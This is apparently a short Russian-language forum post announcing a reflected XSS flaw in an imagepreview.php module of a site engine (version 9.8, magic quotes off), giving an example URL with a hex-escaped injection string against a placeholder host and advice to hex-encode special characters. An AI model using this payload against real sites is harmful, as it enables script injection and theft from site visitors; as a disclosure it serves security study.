17.07.2013, 21:25
|
|
Новичок
Регистрация: 14.07.2013
Сообщений: 9
Провел на форуме:
2022
Репутация:
0
|
|
Нашел пассивную XSS.
Код:
http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]
Заменяем все специальные символы на \x[HEX код символа].
Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю. |
|
|